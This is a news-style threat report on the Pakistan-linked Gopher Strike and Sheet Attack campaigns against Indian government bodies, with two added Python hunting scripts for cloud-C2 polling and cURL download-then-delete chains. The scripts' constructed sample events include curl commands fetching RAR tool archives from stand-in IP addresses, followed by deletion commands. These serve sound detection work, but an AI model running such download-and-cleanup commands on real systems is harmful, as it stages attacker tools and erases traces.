Cybersecurity researchers have identified a series of Pakistan-linked cyber campaigns targeting Indian government entities, raising fresh concerns about state-aligned digital espionage and the evolving tradecraft of advanced persistent threat actors, according to multiple analysts.
Threat intelligence teams, including Zscaler ThreatLabz, first spotted the operations in late 2025 and named the two campaigns Gopher Strike and Sheet Attack, reflecting their distinct methodologies and payload delivery mechanisms.
Both operations appear to have been carried out by a threat actor believed to operate out of Pakistan. According to the detailed reports:
The campaigns named Gopher Strike and Sheet Attack, attributed with medium confidence to Pakistan-linked threat actors possibly related to or parallel with APT36, represent sophisticated cyber espionage operations targeting Indian government entities.
The campaigns demonstrate advanced operational security, including geo-fencing, user-agent checks, and ephemeral tool usage to avoid detection and attribution. No exploitation of software vulnerabilities has been reported for either campaign; initial access relies on social engineering, but the operations highlight evolving tradecraft and the use of public infrastructure for stealthy espionage.
Gopher Strike leverages highly targeted spear-phishing emails that contain malicious attachments designed to impersonate legitimate documents. When recipients open these files, they trigger a sequence of actions that ultimately install remote access tools and backdoors on victim systems.
Detailed technical reports show Gopher Strike initiates payload delivery only if the connection originates from an Indian IP address, a tactic that helps the attackers avoid unwanted detection and refine targeting. A practical consequence for defenders is that a sandbox or analyst fetching the same URL from outside India receives a benign response rather than the payload, so retrieving the next stage requires replaying the request from a matching vantage point with the expected user agent.
Sheet Attack, meanwhile, blurs the line between legitimate cloud usage and covert command-and-control infrastructure by using trusted platforms such as Google Sheets, Firebase, and email services as conduits for malicious traffic. Because commands and collected data are embedded in these widely used services, the traffic is TLS-encrypted to domains most organizations allow, and it blends into ordinary SaaS usage that traditional security monitoring rarely inspects.
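Blocking Google Sheets or Firebase outright is rarely an option, so detection has to come from how the endpoints are used rather than which endpoints are reached. The following is an added example, not code from Zscaler or from the campaign reports: it runs a simple hunt over constructed proxy log lines and flags workstations that talk to spreadsheet or Firebase endpoints with a non-browser user agent or on a suspiciously regular polling schedule. The log format, host names, user agents, and spreadsheet identifiers are all invented for the example; the periodicity threshold is an assumption to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed proxy log lines for this example (not real traffic):
# <timestamp> <source host> "<user-agent>" <destination host> <request path>
SAMPLE_PROXY_LOG = """\
2025-11-03T09:00:00Z ws-042 "Go-http-client/1.1" sheets.googleapis.com /v4/spreadsheets/1AbC/values/Sheet1!A1:B50
2025-11-03T09:05:01Z ws-042 "Go-http-client/1.1" sheets.googleapis.com /v4/spreadsheets/1AbC/values/Sheet1!A1:B50
2025-11-03T09:10:00Z ws-042 "Go-http-client/1.1" sheets.googleapis.com /v4/spreadsheets/1AbC/values/Sheet1!A1:B50
2025-11-03T09:15:02Z ws-042 "Go-http-client/1.1" sheets.googleapis.com /v4/spreadsheets/1AbC/values/Sheet1!A1:B50
2025-11-03T09:02:13Z ws-017 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/130.0" docs.google.com /spreadsheets/d/9XyZ/edit
2025-11-03T09:47:55Z ws-017 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/130.0" docs.google.com /spreadsheets/d/9XyZ/edit
2025-11-03T11:20:40Z ws-017 "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/130.0" sheets.googleapis.com /v4/spreadsheets/9XyZ/values/Sheet1
2025-11-03T09:00:30Z ws-088 "python-requests/2.32" example-app.firebaseio.com /tasks/ws-088.json
2025-11-03T09:30:30Z ws-088 "python-requests/2.32" example-app.firebaseio.com /tasks/ws-088.json
"""

LINE_RE = re.compile(r'^(\S+) (\S+) "([^"]*)" (\S+) (\S+)$')

# SaaS hosts the page names as C2 conduits (Google Sheets, Firebase). Exact
# match on the registered host or any subdomain of it.
CLOUD_C2_HOSTS = re.compile(
    r'(?:^|\.)(?:sheets\.googleapis\.com|docs\.google\.com|'
    r'firebaseio\.com|firebasedatabase\.app)$'
)


def parse_proxy_log(text):
    """Parse the constructed log format into a list of event dicts."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip blank or malformed lines
        ts, src, ua, dest, path = m.groups()
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "src": src, "ua": ua, "dest": dest, "path": path,
        })
    return events


def is_browser_ua(ua):
    """Crude check: real browsers advertise a Mozilla/ token; Go, Python and
    curl clients do not. An implant written in Go that does not spoof its UA
    shows up as Go-http-client."""
    return ua.startswith("Mozilla/")


def find_cloud_c2_candidates(text, min_requests=4, max_jitter=0.1):
    """Return (src, dest) pairs whose traffic to Sheets/Firebase endpoints looks
    automated: a non-browser user agent, or at least min_requests spaced at
    near-constant intervals (coefficient of variation <= max_jitter)."""
    by_pair = defaultdict(list)
    for ev in parse_proxy_log(text):
        if CLOUD_C2_HOSTS.search(ev["dest"]):
            by_pair[(ev["src"], ev["dest"])].append(ev)

    findings = []
    for (src, dest), evs in sorted(by_pair.items()):
        evs.sort(key=lambda e: e["ts"])
        reasons = []
        uas = {e["ua"] for e in evs}
        if any(not is_browser_ua(u) for u in uas):
            reasons.append("non-browser user agent")
        if len(evs) >= min_requests:
            gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(evs, evs[1:])]
            if mean(gaps) > 0 and pstdev(gaps) / mean(gaps) <= max_jitter:
                reasons.append("regular polling interval")
        if reasons:
            findings.append({
                "src": src, "dest": dest, "requests": len(evs),
                "user_agents": sorted(uas), "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in find_cloud_c2_candidates(SAMPLE_PROXY_LOG):
        print(finding)
```

In the constructed data, ws-042 polls the same spreadsheet range every five minutes from a Go HTTP client and is flagged on both criteria, ws-088 is flagged on its user agent alone because two requests are too few to judge periodicity, and ws-017 (a person editing a sheet in Chrome at irregular times) is not flagged. Both heuristics produce false positives for legitimate automation, so the output is a hunting lead to enrich with the originating process, not an alert on its own.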
Researchers note that both campaigns demonstrate sophisticated evasion techniques, including geo-fencing, user-agent checks, and multi-stage execution chains that prioritize stealth and persistence. Once initial access is secured, the adversary may deploy custom downloaders and backdoor tools capable of executing commands, exfiltrating data, and establishing footholds that are difficult to remove.
Zscaler also reported that its researchers observed the threat actor downloading RAR archives with cURL after gaining access to the victim's machine. These archives contain tools that collect system information and deploy GOSHELL, a custom Golang-based loader used to stage Cobalt Strike Beacon after several rounds of decoding. Once the tools have served their purpose, they are deleted from the machine, which leaves endpoint telemetry (process creation and file events) as the main record of the activity.
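Because the tooling is removed after use, the download-use-delete pattern itself is a useful detection signature. The following added example (not code from Zscaler or from the campaign reports) correlates constructed Windows process-creation events: it finds cURL invocations that fetch a RAR archive and then looks for a deletion of that archive on the same host within a time window, rating the chain higher when the cleanup is observed. The event tuples, hosts, paths, and URLs are invented for the example; the 30-minute window and the list of deletion verbs are assumptions to adjust per environment.

```python
import re
from datetime import datetime, timedelta
from ntpath import basename  # handles both "\" and "/" separators for Windows paths and URLs

# Constructed process-creation events for this example (not real telemetry):
# (timestamp, host, image path, command line)
SAMPLE_PROCESS_EVENTS = [
    ("2025-11-03T10:12:04Z", "ws-042", r"C:\Windows\System32\curl.exe",
     r"curl.exe -s -o C:\Users\Public\upd.rar http://203.0.113.10/files/upd.rar"),
    ("2025-11-03T10:12:30Z", "ws-042", r"C:\Windows\System32\cmd.exe",
     r"cmd.exe /c C:\Users\Public\sysinfo.exe > C:\Users\Public\out.txt"),
    ("2025-11-03T10:13:15Z", "ws-042", r"C:\Windows\System32\cmd.exe",
     r"cmd.exe /c del C:\Users\Public\upd.rar C:\Users\Public\sysinfo.exe"),
    ("2025-11-03T10:20:00Z", "ws-017", r"C:\Windows\System32\curl.exe",
     r"curl.exe -o C:\Temp\release-notes.pdf https://vendor.example/release-notes.pdf"),
    ("2025-11-03T14:05:00Z", "ws-088", r"C:\Windows\System32\curl.exe",
     r"curl.exe -O http://198.51.100.7/pkg/tools.rar"),
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Deletion verbs for cmd.exe, PowerShell and Unix-style shells (assumed list).
DELETE_RE = re.compile(r"\b(del|erase|rm|Remove-Item)\b", re.IGNORECASE)


def _ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def archive_download(image, cmd):
    """Return (url, local_file_name) when the event is cURL fetching a .rar
    archive, otherwise None. Only unquoted arguments are handled here; a
    production parser would also deal with quoted paths."""
    if basename(image).lower() not in ("curl.exe", "curl"):
        return None
    tokens = cmd.split()
    url = next((t for t in tokens if URL_RE.fullmatch(t)), None)
    if url is None:
        return None
    url_path = url.split("?", 1)[0]
    local = basename(url_path)  # default: -O / --remote-name behaviour
    for i, t in enumerate(tokens):
        if t in ("-o", "--output") and i + 1 < len(tokens):
            local = basename(tokens[i + 1])  # explicit output file wins
    if not (local.lower().endswith(".rar") or url_path.lower().endswith(".rar")):
        return None
    return url, local


def find_curl_archive_chains(events, window=timedelta(minutes=30)):
    """Correlate cURL RAR downloads with a later deletion of the same archive
    on the same host. Severity is 'high' when the cleanup step is seen and
    'medium' when only the download is seen."""
    events = sorted(events, key=lambda e: e[0])  # ISO-8601 strings sort chronologically
    findings = []
    for i, (ts, host, image, cmd) in enumerate(events):
        hit = archive_download(image, cmd)
        if hit is None:
            continue
        url, archive = hit
        t0 = _ts(ts)
        cleanup_ts = None
        for ts2, host2, _image2, cmd2 in events[i + 1:]:
            if _ts(ts2) - t0 > window:
                break  # later events are outside the window too
            if host2 != host:
                continue
            if DELETE_RE.search(cmd2) and archive.lower() in cmd2.lower():
                cleanup_ts = ts2
                break
        findings.append({
            "host": host, "archive": archive, "url": url,
            "download_ts": ts, "cleanup_ts": cleanup_ts,
            "severity": "high" if cleanup_ts else "medium",
        })
    return findings


if __name__ == "__main__":
    for finding in find_curl_archive_chains(SAMPLE_PROCESS_EVENTS):
        print(finding)
```

On the constructed data, ws-042 yields a high-severity chain (archive fetched, a tool run, archive and tool deleted a minute later), ws-088 yields a medium-severity download with no cleanup observed, and the PDF download on ws-017 is ignored. The same correlation extends naturally to file-deletion telemetry where it is available, which catches cleanup performed by the tool itself rather than through a shell command.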
This is not the first time Pakistan-linked hackers have been implicated in cross-border cyber operations targeting Indian networks. Analysts have previously uncovered campaigns attributed to APT36 and affiliated clusters that used remote access trojans to target government, military, and academic institutions. These intrusions often rely on deceptive delivery mechanisms, including weaponized Windows shortcut files and fake documents, to lure unsuspecting users into activating malicious code.
Independent media and regional reporting suggest that digital espionage tensions between India and Pakistan have intensified alongside broader geopolitical disputes, increasingly spilling into cyberspace with targeted attacks on critical infrastructure, government portals, and defense networks. Cyber espionage activity rose markedly in the aftermath of the May 2025 war, as the two neighbors traded accusations over terrorism and sought to undermine each other by covert means.
Additional context from other cybersecurity research highlights similar trends, including campaigns that used unconventional command-and-control channels such as Discord features or social engineering lures disguised as legitimate applications. These examples underscore how sophisticated threat actors continually adapt their techniques to bypass detection and expand surveillance or data extraction efforts.